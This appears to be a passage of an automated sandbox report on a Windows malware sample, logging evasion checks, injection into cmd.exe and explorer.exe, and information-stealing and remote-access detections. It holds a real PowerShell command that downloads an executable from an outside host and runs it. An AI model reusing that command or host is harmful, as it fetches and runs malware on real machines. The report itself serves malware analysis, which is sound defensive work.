                      Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\rjhlrgwtJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_13-18189
                      Source: C:\Users\user\DZIPR.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_12-18714
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_13-18286
                      Source: C:\Users\user\DZIPR.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_12-18811
                      Source: C:\Users\user\DZIPR.exeAPI coverage: 4.5 %
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeAPI coverage: 4.1 %
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeAPI coverage: 4.3 %
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6500Thread sleep count: 4968 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 712Thread sleep count: 4876 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6692Thread sleep time: -13835058055282155s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4460Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 7908Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Roaming\hello.exeCode function: 11_2_0040301A GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,11_2_0040301A
                      Source: C:\Users\user\AppData\Roaming\hello.exeCode function: 11_2_00402B79 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,11_2_00402B79
                      Source: C:\Users\user\DZIPR.exeCode function: 12_2_6FE2748E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,12_2_6FE2748E
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 13_2_6C91748E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,13_2_6C91748E
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 19_2_6FEA748E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,19_2_6FEA748E
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                      Source: explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: noreply@vmware.com0
                      Source: explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0
                      Source: hello.exe, 0000000B.00000002.1401612275.0000000000621000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1!0
                      Source: DZIPR.exe, 0000000C.00000002.1398188269.000000000343A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6vmware
                      Source: explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0/
                      Source: svchost.exe, 00000012.00000002.2496354459.00000174C5854000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1
                      Source: explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.0
                      Source: hello.exe, 0000000B.00000002.1401612275.0000000000621000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y%
                      Source: svchost.exe, 00000012.00000002.2495105676.00000174C002B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0Z
                      Source: C:\Users\user\DZIPR.exeAPI call chain: ExitProcess graph end nodegraph_12-18812
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeAPI call chain: ExitProcess graph end nodegraph_13-18287
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\DZIPR.exeCode function: 12_2_6FE33F34 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_6FE33F34
                      Source: C:\Users\user\AppData\Roaming\hello.exeCode function: 11_2_00406D5D LoadLibraryA,GetProcAddress,GetModuleHandleW,GetWindow,GetWindow,LoadIconW,GetWindow,11_2_00406D5D
                      Source: C:\Users\user\DZIPR.exeCode function: 12_2_6FE25D78 mov eax, dword ptr fs:[00000030h]12_2_6FE25D78
                      Source: C:\Users\user\DZIPR.exeCode function: 12_2_6FE25CA0 mov eax, dword ptr fs:[00000030h]12_2_6FE25CA0
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 13_2_6C915CA0 mov eax, dword ptr fs:[00000030h]13_2_6C915CA0
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 19_2_6FEA5D78 mov eax, dword ptr fs:[00000030h]19_2_6FEA5D78
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 19_2_6FEA5CA0 mov eax, dword ptr fs:[00000030h]19_2_6FEA5CA0
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\DZIPR.exeCode function: 12_2_6FE33F34 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_6FE33F34
                      Source: C:\Users\user\DZIPR.exeCode function: 12_2_6FE3CE5C __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_6FE3CE5C
                      Source: C:\Users\user\DZIPR.exeCode function: 12_2_6FE38034 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_6FE38034
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 13_2_6C92CE5C __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_6C92CE5C
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 13_2_6C923F34 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_6C923F34
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 13_2_6C928034 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_6C928034
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 19_2_6FEB3F34 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,19_2_6FEB3F34
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 19_2_6FEBCE5C __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_6FEBCE5C
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 19_2_6FEB8034 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,19_2_6FEB8034

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Users\user\DZIPR.exeNtQuerySystemInformation: Direct from: 0x6FE266A2Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeNtProtectVirtualMemory: Direct from: 0x6C982E3DJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeNtQuerySystemInformation: Direct from: 0x6FEA66A2Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeNtProtectVirtualMemory: Direct from: 0x6FF0F4DDJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeNtQuerySystemInformation: Direct from: 0x6C9166A2Jump to behavior
                      Source: C:\Users\user\DZIPR.exeNtProtectVirtualMemory: Direct from: 0x77757B2EJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeNtQuerySystemInformation: Direct from: 0x701066A2Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeNtProtectVirtualMemory: Direct from: 0x6FF038F3Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeNtProtectVirtualMemory: Direct from: 0x6FF12B32Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 8164 base: F379C0 value: 55Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 8164 base: 4A0000 value: 00Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 4044 base: F379C0 value: 55Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 4044 base: 560000 value: 00Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 2056 base: F379C0 value: 55Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 2056 base: 400000 value: 00Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 1180 base: F379C0 value: 55Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 1180 base: 310000 value: 00Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read writeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read writeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read writeJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: NULL target: C:\Windows\SysWOW64\explorer.exe protection: read writeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read writeJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: F379C0Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 4A0000Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: F379C0Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 560000Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: F379C0Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 400000Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: F379C0Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 310000Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://lawyerconsult.top/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/hello.exeJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\hello.exe C:\Users\user\AppData\Roaming/hello.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hello.exeProcess created: C:\Users\user\DZIPR.exe "C:\Users\user\DZIPR.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hello.exeCode function: 11_2_0040D72E cpuid 11_2_0040D72E
                      Source: C:\Users\user\AppData\Roaming\hello.exeCode function: GetLastError,GetLastError,wsprintfW,GetEnvironmentVariableW,GetEnvironmentVariableW,GetLastError,??2@YAPAXI@Z,GetEnvironmentVariableW,GetLastError,lstrcmpiW,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,lstrlenA,??2@YAPAXI@Z,GetLocaleInfoW,_wtol,MultiByteToWideChar,11_2_00401F9D
                      Source: C:\Users\user\DZIPR.exeCode function: GetLocaleInfoA,12_2_6FE44DBC
                      Source: C:\Users\user\DZIPR.exeCode function: GetLocaleInfoW,__snwprintf_s,LoadLibraryW,12_2_6FE289B5
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: GetLocaleInfoA,13_2_6C934DBC
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: GetLocaleInfoW,__snwprintf_s,LoadLibraryW,13_2_6C9189B5
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: GetLocaleInfoA,19_2_6FEC4DBC
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: GetLocaleInfoW,__snwprintf_s,LoadLibraryW,19_2_6FEA89B5
                      Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hello.exeCode function: 11_2_00401626 ??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLocalTime,SystemTimeToFileTime,??2@YAPAXI@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,11_2_00401626
                      Source: C:\Users\user\DZIPR.exeCode function: 12_2_6FE3D72B __lock,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,____lc_codepage_func,__getenv_helper_nolock,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,12_2_6FE3D72B
                      Source: C:\Users\user\AppData\Roaming\hello.exeCode function: 11_2_00404FAA GetVersionExW,GetCommandLineW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetModuleFileNameW,_wtol,??2@YAPAXI@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,CoInitialize,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetKeyState,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetFileAttributesW,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,memset,ShellExecuteExW,WaitForSingleObject,CloseHandle,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetCurrentDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,MessageBoxA,11_2_00404FAA

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 20.2.cmd.exe.55000c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.cmd.exe.5ff00c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 28.2.cmd.exe.57d00c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.cmd.exe.5ff00c8.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.cmd.exe.58300c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 28.2.cmd.exe.57d00c8.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.cmd.exe.55000c8.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.cmd.exe.58300c8.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000016.00000002.1679023505.00000000004F9000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000002.2075718056.00000000057D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.2009928671.0000000005830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000002.2074816955.0000000000369000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.2008670032.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.1679242775.0000000005FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.1827119501.0000000005500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 7620, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 8068, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 8164, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 6732, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 4044, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 6116, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 2056, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 1180, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\paogviura, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\rjhlrgwt, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\lejp, type: DROPPED

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: 20.2.cmd.exe.55000c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.cmd.exe.5ff00c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 28.2.cmd.exe.57d00c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.cmd.exe.5ff00c8.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.cmd.exe.58300c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 28.2.cmd.exe.57d00c8.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.cmd.exe.55000c8.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.cmd.exe.58300c8.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000016.00000002.1679023505.00000000004F9000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000002.2075718056.00000000057D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.2009928671.0000000005830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000002.2074816955.0000000000369000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.2008670032.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.1679242775.0000000005FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.1827119501.0000000005500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 7620, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 8068, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 8164, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 6732, type: MEMORYSTR
